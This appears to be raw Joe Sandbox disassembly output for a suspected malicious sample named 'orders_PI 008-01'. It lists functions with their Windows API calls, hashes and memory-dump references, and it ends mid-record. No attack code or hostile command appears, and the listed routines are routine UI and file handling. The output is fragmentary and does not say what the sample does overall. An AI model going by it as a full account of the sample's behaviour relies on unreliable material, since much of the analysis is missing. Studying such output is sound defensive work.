                                        • API String ID: 438689982-3163232059
                                        • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                        • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                        • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                        • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                        Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                        • wcscpy.MSVCRT ref: 00414DF3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                        • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                        • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                        • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                        Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • _snwprintf.MSVCRT ref: 00410FE1
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • _snwprintf.MSVCRT ref: 0041100C
                                        • wcscat.MSVCRT ref: 0041101F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                        • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                        • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                        • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                        Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                        • malloc.MSVCRT ref: 00417459
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                                        • free.MSVCRT ref: 0041747F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                        • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                        Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                        • RegisterClassW.USER32(00000001), ref: 00412428
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID:
                                        • API String ID: 2678498856-0
                                        • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                        • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                        Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item
                                        • String ID:
                                        • API String ID: 3888421826-0
                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                        Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00417B7B
                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                        • GetLastError.KERNEL32 ref: 00417BB5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastLockUnlockmemset
                                        • String ID:
                                        • API String ID: 3727323765-0
                                        • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                        • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                        Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040F673
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                        • strlen.MSVCRT ref: 0040F6A2
                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                        • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                        Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040F6E2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                        • strlen.MSVCRT ref: 0040F70D
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                        • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                        Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00402FD7
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                        • strlen.MSVCRT ref: 00403006
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                        • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                        • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                        • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                        Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                        Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Time$System$File$LocalSpecific
                                        • String ID:
                                        • API String ID: 979780441-0
                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                        Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                        Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: InvalidateMessageRectSend
                                        • String ID: d=E
                                        • API String ID: 909852535-3703654223
                                        • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                        • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                        • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                        • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                        Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 0040F79E
                                        • wcschr.MSVCRT ref: 0040F7AC
                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcschr$memcpywcslen
                                        • String ID: "
                                        • API String ID: 1983396471-123907689
                                        • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                        • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                        Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                        • _memicmp.MSVCRT ref: 0040C00D
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FilePointer_memicmpmemcpy
                                        • String ID: URL
                                        • API String ID: 2108176848-3574463123
                                        • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                        • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                        • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                        • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                        Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 0040A398
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                        • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                        Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintf
                                        • String ID: %%-%d.%ds
                                        • API String ID: 3988819677-2008345750
                                        • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                        • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                        Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                        • memset.MSVCRT ref: 00401917
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
